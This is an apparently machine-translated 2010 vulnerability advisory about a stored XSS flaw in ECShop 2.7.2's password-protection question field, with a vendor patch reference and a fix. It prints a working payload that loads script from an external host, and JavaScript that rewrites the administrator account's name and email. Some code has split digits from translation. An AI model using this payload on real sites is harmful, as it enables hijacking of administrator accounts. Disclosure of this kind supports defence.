Ecshop2. 7. 2 persistent XSS to obtain administrator account-the vulnerability warning-the black bar safety net

2010-10-21T00:00:00
ID MYHACK58:62201028155
Type myhack58
Reporter 佚名
Modified 2010-10-21T00:00:00

Description

Vulnerability details

Brief description:

Personal data changes, the Javascript code for the filter are not stringent enough, theXSSthe code directly into the database

Detailed description:

!

Password protection question this one, not using the regular filter, the other has the regular filter. We can be in a password-protected question inputXSS, but the background view the member information is not to display password protected issue, so there must be a site background to add a new “member registration”, the background check information will be displayed, fill in the period of the introduction of external js code:"><script src="http://www.***. com/test.js" type="text/javascript"></script> The external test. the js file content as follows Ajax. call('privilege. php? act=update','id=1&user_name=heihei&email=10001@qq.com',","POST","JSON");

Vulnerability proof:

!

!

Repair solutions:

Program 5 0 4 row

$temp_field_content = strlen($_POST[$extend_field_index]) > 1 0 0 ? mb_substr($_POST[$extend_field_index], 0, 9 9) : $_POST[$extend_field_index];

Modified to

$temp_field_content = strlen($_POST[$extend_field_index]) > 1 0 0 ? mb_substr(htmlspecialchars($_POST[$extend_field_index]), 0, 9 9) : htmlspecialchars($_POST[$extend_field_index]);


Vulnerability response

Vendor response:

Hazard rating: medium

Vulnerability Rank: 8th

Confirmation time: 2010-09-21

Vendor reply:

It has been confirmed that a patch is later released.

Latest status:

2010-09-25: the patch download address http://bbs.ecshop.com/thread-138506-1-1.html